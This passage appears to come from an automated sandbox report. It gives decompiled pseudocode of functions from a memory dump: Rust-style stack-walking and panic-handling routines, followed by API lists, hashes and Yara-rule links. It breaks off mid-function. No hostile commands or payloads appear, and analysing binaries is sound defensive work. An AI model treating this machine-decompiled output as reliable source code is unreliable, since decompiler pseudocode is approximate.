                          Function 6F23DEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6F23DEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6F243B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6F24C310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6f27d0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6F257370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6F256DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6f27ded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6F240EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6f28adc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6f28adc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6f28adc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6f27d5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6f27cd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6F232320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6f28adc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6f27d5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6F24C310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6F249EEE();
						_t217 = E6F23E690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6f28ade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6f28add0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6F256E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6f27e2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6f28ade8 = _t218;
									_t267 =  *0x6f28adec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6f28adec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6f28adf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6F24C310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6F23E890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6f28add0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6F24C310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6f28ade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6f28add0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6F256E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6f27e2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6f28ade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6F23E890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6f28adf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6f28add0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6F256E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6f27e2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6F23E880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6f28adec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6f28adc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6f27d63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6f27cd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6F232320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}



















































                          0x6f23dee3
                          0x6f23dee4
                          0x6f23dee5
                          0x6f23dee9
                          0x6f23deef
                          0x6f23def1
                          0x6f23def7
                          0x6f23defd
                          0x6f23df07
                          0x6f23df21
                          0x6f23df27
                          0x6f23df2e
                          0x6f23df30
                          0x6f23df33
                          0x6f23df44
                          0x6f23df49
                          0x6f23df4c
                          0x6f23df51
                          0x6f23df56
                          0x6f23df5d
                          0x6f23df60
                          0x6f23df67
                          0x6f23df6a
                          0x6f23df77
                          0x6f23df7a
                          0x6f23df96
                          0x6f23df96
                          0x6f23df9c
                          0x6f23dfa0
                          0x6f23dfa2
                          0x6f23dfa4
                          0x6f23dfae
                          0x6f23dfb2
                          0x6f23dfb7
                          0x6f23dfbd
                          0x6f23dfbd
                          0x6f23dfc0
                          0x6f23dfc3
                          0x6f23dfc6
                          0x6f23dfc9
                          0x6f23dfcc
                          0x6f23dfcf
                          0x6f23df7c
                          0x6f23dfe0
                          0x6f23dfe0
                          0x6f23dfe6
                          0x6f23dfed
                          0x6f23dfed
                          0x6f23dff0
                          0x6f23dff2
                          0x6f23dffa
                          0x6f23e000
                          0x6f23e004
                          0x6f23e012
                          0x6f23df80
                          0x6f23df83
                          0x6f23df85
                          0x6f23e03d
                          0x6f23e040
                          0x6f23e04a
                          0x6f23e04c
                          0x6f23e568
                          0x00000000
                          0x6f23e052
                          0x6f23e052
                          0x6f23e055
                          0x6f23e058
                          0x6f23e059
                          0x6f23e05e
                          0x6f23e064
                          0x6f23e069
                          0x6f23e06b
                          0x6f23e06e
                          0x6f23e073
                          0x6f23e076
                          0x6f23e078
                          0x00000000
                          0x00000000
                          0x6f23e07a
                          0x00000000
                          0x6f23e078
                          0x6f23df8b
                          0x6f23df8b
                          0x6f23df91
                          0x6f23df94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23df94
                          0x6f23e027
                          0x6f23e02a
                          0x6f23e032
                          0x6f23e035
                          0x00000000
                          0x6f23e03b
                          0x00000000
                          0x6f23e03b
                          0x00000000
                          0x6f23e035
                          0x6f23e07c
                          0x6f23e07c
                          0x6f23e082
                          0x6f23e084
                          0x6f23e087
                          0x6f23e08e
                          0x6f23e091
                          0x6f23e093
                          0x6f23e095
                          0x6f23e095
                          0x6f23e099
                          0x6f23e09b
                          0x6f23e0a0
                          0x6f23e0ad
                          0x6f23e0ad
                          0x6f23e0a0
                          0x6f23e099
                          0x6f23e0b2
                          0x6f23e0b2
                          0x6f23e0b4
                          0x6f23e11e
                          0x6f23e121
                          0x6f23e124
                          0x6f23e127
                          0x6f23e12a
                          0x6f23e0b6
                          0x6f23e0b6
                          0x6f23e0ba
                          0x6f23e0bc
                          0x6f23e0c1
                          0x6f23e0c7
                          0x6f23e0d2
                          0x6f23e0d4
                          0x6f23e0d7
                          0x6f23e0da
                          0x6f23e0dd
                          0x6f23e0e1
                          0x6f23e0e3
                          0x6f23e0e5
                          0x6f23e0e9
                          0x6f23e0eb
                          0x6f23e0eb
                          0x6f23e0f7
                          0x6f23e0fc
                          0x6f23e0fc
                          0x6f23e108
                          0x6f23e108
                          0x6f23e10d
                          0x6f23e110
                          0x6f23e112
                          0x6f23e112
                          0x6f23e134
                          0x6f23e137
                          0x6f23e13d
                          0x6f23e140
                          0x6f23e143
                          0x6f23e14d
                          0x6f23e157
                          0x6f23e161
                          0x6f23e16b
                          0x6f23e178
                          0x6f23e181
                          0x6f23e182
                          0x6f23e187
                          0x6f23e18a
                          0x6f23e18c
                          0x6f23e405
                          0x6f23e405
                          0x6f23e408
                          0x6f23e40a
                          0x6f23e40c
                          0x6f23e410
                          0x6f23e41b
                          0x6f23e41b
                          0x6f23e410
                          0x6f23e420
                          0x00000000
                          0x6f23e192
                          0x6f23e192
                          0x6f23e198
                          0x6f23e19f
                          0x6f23e1a3
                          0x6f23e1a6
                          0x6f23e1ad
                          0x6f23e1af
                          0x6f23e1b8
                          0x6f23e1be
                          0x6f23e1c1
                          0x6f23e1c8
                          0x6f23e1cc
                          0x6f23e1d2
                          0x6f23e1d8
                          0x6f23e1de
                          0x6f23e1e6
                          0x6f23e1ef
                          0x6f23e1f9
                          0x6f23e200
                          0x6f23e205
                          0x6f23e208
                          0x6f23e209
                          0x6f23e20e
                          0x6f23e213
                          0x6f23e215
                          0x6f23e226
                          0x6f23e22c
                          0x6f23e22f
                          0x6f23e231
                          0x6f23e24a
                          0x6f23e250
                          0x6f23e252
                          0x6f23e595
                          0x6f23e5ae
                          0x00000000
                          0x6f23e258
                          0x6f23e258
                          0x6f23e25a
                          0x6f23e25f
                          0x6f23e265
                          0x6f23e267
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e267
                          0x6f23e233
                          0x6f23e233
                          0x6f23e239
                          0x6f23e23b
                          0x6f23e289
                          0x6f23e28e
                          0x6f23e291
                          0x6f23e296
                          0x6f23e299
                          0x6f23e29c
                          0x6f23e29e
                          0x6f23e2be
                          0x6f23e2be
                          0x6f23e2c7
                          0x6f23e2ce
                          0x6f23e2dd
                          0x6f23e2e2
                          0x6f23e2f7
                          0x6f23e2fe
                          0x6f23e301
                          0x6f23e30b
                          0x6f23e311
                          0x6f23e31b
                          0x6f23e325
                          0x6f23e32b
                          0x6f23e335
                          0x6f23e340
                          0x6f23e35e
                          0x6f23e361
                          0x6f23e364
                          0x00000000
                          0x00000000
                          0x6f23e376
                          0x6f23e37c
                          0x6f23e386
                          0x6f23e38b
                          0x6f23e38e
                          0x6f23e391
                          0x6f23e393
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e393
                          0x00000000
                          0x6f23e2a0
                          0x6f23e2ab
                          0x6f23e2b1
                          0x6f23e2b3
                          0x6f23e464
                          0x6f23e469
                          0x6f23e47e
                          0x6f23e485
                          0x6f23e48c
                          0x6f23e496
                          0x6f23e49d
                          0x6f23e4a0
                          0x6f23e4aa
                          0x6f23e4b0
                          0x6f23e4ba
                          0x6f23e4c4
                          0x6f23e4ca
                          0x6f23e4d4
                          0x6f23e4e0
                          0x6f23e4e0
                          0x6f23e4e6
                          0x6f23e4e8
                          0x6f23e506
                          0x6f23e522
                          0x6f23e524
                          0x6f23e527
                          0x6f23e395
                          0x6f23e398
                          0x6f23e39d
                          0x6f23e3a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e4ea
                          0x6f23e4f5
                          0x6f23e4fb
                          0x6f23e4fd
                          0x6f23e572
                          0x6f23e58b
                          0x00000000
                          0x6f23e4ff
                          0x6f23e4ff
                          0x6f23e501
                          0x00000000
                          0x6f23e501
                          0x6f23e4fd
                          0x00000000
                          0x6f23e52d
                          0x6f23e53d
                          0x6f23e543
                          0x6f23e54d
                          0x6f23e552
                          0x6f23e555
                          0x6f23e558
                          0x6f23e558
                          0x00000000
                          0x6f23e2b9
                          0x6f23e2b9
                          0x00000000
                          0x6f23e2b9
                          0x6f23e2b3
                          0x6f23e23d
                          0x6f23e269
                          0x6f23e274
                          0x6f23e27a
                          0x6f23e27c
                          0x6f23e5b8
                          0x6f23e5d1
                          0x6f23e5d9
                          0x6f23e5d9
                          0x6f23e5e0
                          0x6f23e5fc
                          0x6f23e282
                          0x6f23e282
                          0x6f23e284
                          0x00000000
                          0x6f23e284
                          0x6f23e27c
                          0x6f23e23b
                          0x6f23e217
                          0x6f23e217
                          0x6f23e21b
                          0x00000000
                          0x6f23e221
                          0x6f23e3a3
                          0x6f23e3a3
                          0x6f23e3a7
                          0x6f23e437
                          0x6f23e437
                          0x6f23e43a
                          0x6f23e43c
                          0x6f23e43e
                          0x6f23e442
                          0x6f23e44d
                          0x6f23e44d
                          0x6f23e442
                          0x6f23e452
                          0x6f23e3ad
                          0x6f23e3b0
                          0x6f23e3ba
                          0x6f23e3c4
                          0x6f23e3ce
                          0x6f23e3d8
                          0x6f23e3e2
                          0x6f23e3f8
                          0x6f23e3f9
                          0x6f23e401
                          0x6f23e403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e403
                          0x6f23e3a7
                          0x6f23e422
                          0x6f23e428
                          0x6f23e436
                          0x6f23e436
                          0x6f23e215
                          0x6f23e18c
                          0x00000000

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 6F23DFF2
                          • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6F23DFFA
                          • GetLastError.KERNEL32 ref: 6F23E006
                          • GetLastError.KERNEL32 ref: 6F23E018
                          • GetLastError.KERNEL32 ref: 6F23E07C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6F23E0AD
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23E0F7
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23E108
                          • GetCurrentProcess.KERNEL32(?), ref: 6F23E1E1
                          • GetCurrentThread.KERNEL32 ref: 6F23E1E9
                          • RtlCaptureContext.KERNEL32(?), ref: 6F23E209
                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6F23E24A
                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6F23E274
                          • GetCurrentProcess.KERNEL32 ref: 6F23E289
                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6F23E2AB
                          • ReleaseMutex.KERNEL32(?), ref: 6F23E398
                          • HeapFree.KERNEL32(00000000,?), ref: 6F23E41B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 6F23E44D
                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6F23E4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                          • API String ID: 1381040140-1036201984
                          • Opcode ID: f4295deff1f09b3f322118f9920b88205ed36aae3ba3b50b73bb151dec997bf2
                          • Instruction ID: 8a5430925a3271f593de51d4acebd586752ddda834b8d6a51deecbf2f87f9f19
                          • Opcode Fuzzy Hash: f4295deff1f09b3f322118f9920b88205ed36aae3ba3b50b73bb151dec997bf2
                          • Instruction Fuzzy Hash: E21227B1A00F099FE721CF24C984B93BBF5BF4A309F00491DD5AA86A90DB75B859CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C8C0, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 477memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6F23C8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6F243B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6f28adc0], esi");
				_t190 = E6F23D1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6F256EE0(_t264,  &M6F27D0E7, 0x46, _t337,  &_v68, 0x6f27d060, 0x6f27d1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6f27cd60;
						_v120 = 0x6f27d014;
						_v68 = 0x6f27da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6F232640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6F23D2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6f28adc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6f28adc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6f27da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6f27cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6F23D2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6f28adbc);
					_v144 = 0x6f28adbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6F23D1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
